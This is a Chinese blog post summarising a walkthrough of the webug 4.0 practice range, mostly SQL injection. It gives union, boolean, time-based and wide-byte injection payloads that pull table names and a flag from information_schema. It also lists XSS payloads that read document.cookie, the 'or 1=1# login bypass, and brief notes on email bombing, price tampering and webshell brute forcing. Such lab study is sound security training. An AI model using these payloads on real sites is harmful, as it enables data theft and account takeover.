web漏洞4.0靶场的总结梳理

                基础知识补充

                select schema_name from information_schema.schemate 查询库信息

                select table_name from information_schema.tables where table_schema='库名'

                select column_name from information_schema.column where table_name ='表名'

                select 列名 from 库.表

一.显错注入:攻击流程:

                1;判断是否存在sql注入漏洞。
                2;判断网页存在字段数。
                3;判断回显点。
                4;获取信息

                1;id=1 and 1=2查看页面是否显示错误 1=1查看是否有逻辑错误,正常就判断有注点。

                加入单引号查看是否出错

                2;判断字段数’order by 1,2,3,4 发现 3不行 2行 判断字段数为2

                3;通过代码执行? 联合查询    id=-1' union select 1,database()--+

                4,;带入数据库?id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7765627567--+   得到表名

                ?id=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x666c6167--+得到flag外部表名

                ?id=-1' union select 1,flag from webug.flag--+ 得到值

               flag查询到为dfafdasfafdsadfa

        二,布尔注入:

                同样的 先 ' 再--+ 发现’出错 有SQL注点 

                orderby 一下 发现2 行3 不行

                用SQL语句:id=1%27%20and%20length(database())=5--+

               确定数据库有5个字符串

                进行用SQL语句:?id=1' and left((select flag from webug.flag),1)='a'--+

                ABCD的尝试 或用ASCII码来判断 也可用burpsuite的攻击模块

        三,延时注入

                和布尔注入原理一致即执行语句后正确就延时 不正确就不延时,通过时间判断字符串

使用函数sleep()

        四,POST注入

                找到post注点 用BP抓取后 找到关键字

                更改数据包请求 从而达到获取数据库更多信息

        五.过滤注入

                没有了解到靶场相关注点,但是可于SQLi-lib上学习,大致方法相当于在过滤语句中添加注释符双写之类的绕过或利用

        六.宽字节注入

                简单的说就是ASCII码的单字节和其他GBK双字节有冲突,容易将/消除从而注入

最简单的加入%df 简单代码?id=%df%27%20union%20select%201,database()--+

得到数据库webug_width_byte转ASCII码 这里我使用显错注入

id=%df%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x77656275675F77696474685F62797465--+

得到两表 sqlinjection,storage_xss  转16进制

73716C696E6A656374696F6E                     73746F726167655F787373

id=%df%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x73716C696E6A656374696F6E--+

 select column_name from information_schema.column where table_name =

id,content,id,content显然还有两个表

id=%df%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x73746F726167655F787373--+

 id,content,userId

求userId

?id=%df%27%20union%20select%201,userId%20from%20webug_width_byte.storage_xss--+

得到userId=1sqlinjection

        七.CSV注入

        平台并没有相关的靶场训练,但其原理是对于一个XML文件通过新建一个TXT文件使用解码工具解码为XML语言后 进行输入 默认会遍历两个文件生成第三个文件从而达到获取信息效果。

        八.XSS

        反射型:多在URL中 简单代码<script>alert(document.cookie)</script>

        存储型:多在输入的交互区

        DOM型:在搜索框中 先闭合前面的语句,后弹出,最后闭合

        过滤XSS:用隐秘级标签:<img src=1 οnerrοr=alert(1)>

        九.万能密码

               'or 1=1#

        十.万能下载:

        多用于信息收集,可查看网页的绝对路径,从而下载系统中的一些源文件,达到信息收集的目的。

        

        十一.MySQL的配置文件下载。

可以通过报错获得绝对路径  熟悉通用文件存放位置是实现渗透的关键。其他的和万能下载一致  

        十二.文件上传漏洞:可参考文件上传事要

        十三.越权修改密码:用万能密码或者弱口令

        十四.恶意收购。抓包改价格 多用于改优惠券价格

        十五.邮箱轰炸.repeater进行手动轰炸

        十六.越权查看admin,

        十七.URL跳转。先抓包

        十八文件包含漏洞

        十九webshell爆破  先抓包 后用B forcer爆破

        最后两关做不了:

        命令包含:通过过构造命令拼接来执行额外系统命令,比如代码的IP加入ID

        ssrf:服务器端请求伪造;利用一个可以发起网络请求的服务,可以当做跳板来攻击。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
足够无余庄 的 HTML HTML 4.0 手册(中文版) ,可以说是最全的 HTML 4.0 手册 原文件是HTML文件,需要COPY到C:\HTML40\目录下才能看,不方便。 由精品技术论坛的 Commands 同学转主 CHM 格式。 [转贴] 我 在 去 年 的 1997 月 9 日 至 7 月 31 日 之 间, 翻 译 了 Hyper Text Mark Language (HTML) 4.0 Draft, 并 且 通 过 W3C (World Wide Web Consortium) 组 织 的 确 认, W3C 组 织 把 我 的 名 字 放 在 他 们 节 点 的 这里 和 那里 之 后, 我 每 天 都 会 收 到 一 两 封 信 向 我 索 要 这 份 文 档. 甚 至 有 人 打 算 寄 钱 给 我, 买 一 份 拷 贝, 其 实 这 份 文 档 的 在线 版 本 完 全 是 免 费 的, 当 然, 为 了 这 份 文 档 的 更 完 善 化 和真 正 的 完 全 的 免 费 化, 我 也 接 受 各 种 类 型 的 赞 助. 目 前, 这 份 文 档 是 在 整 个 国 际 互 联 网 络 上 能 够 找 到 的 唯一 的 中 文 版 的 HTML 4.0 协 议 书, 虽 然 它 是 免 费 的, 但 还 是 要请 各 位 网 友 遵 守 版 权 约 定, 任 何 未 经 本 人 授 权 的 转 载 (不包 括 热 链) 在 内, 印 刷 都 将 在 法 律 上 被 认 为 是 非 法 的. 不 过, 作 者 欢 迎 各 位 在 网 页 上 通 过 如 下 的 代 码 制 作 热链: <A HREF="http://gb-html.home.ml.org"><IMG SRC="/image/html40forenough.gif" BORDER=0 HEIGHT=21 WIDTH=472></A> 上 面 的 代 码 会 把 本 页 顶 端 的 图 案 放 置 在 您 的 网 页 上, 并且 把 链 接 到 这 里, 这 一 切 都 是 免 费 的, 不 过, 如 果 您 愿 意 的话, 请 给 我 发 一 封 信. 这 份 文 档 从 来 都 没 有 如 此 完 整 的 出 现 在 网 上 过 (指 中 文版), 这 次 由 于 足 够 无 余 庄 的 少 庄 主 向 我 索 要, 我 实 在 不 忍拂 了 如 此 美 丽 的 姑 娘 的 意, 因 此 特 地 写 了 这 段 序, 把 它 放在 这 里, 而 且, 这 一 次, 还 特 地 提 供 了 压 缩 版 本, 您 可 以 自 由地 下 载. 下 面 分 别 是 在 线 浏 览 和 下 载 这 套 文 档 的 链 接. 对 于 这 种 文 档 的 翻 译, 我 是 第 一 次, 希 望 网 络 高 手 和 英语 高 手 能 够 给 我 提 出 意 见, 让 我 能 够 更 好 地 来 改 进 这 份 文档, 也 为 了 能 够 让 更 多 的 中 国 人 能 够 进 入 电 脑 高 手 的 行 列. 好 了, 现 在 就 进 入 HTML 4.0 中 文 版 吧: 1. 中 文 版 超 文 本 标 注 语 言 首 页 邵 宛 澍 1998 年 1 月 24 日

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值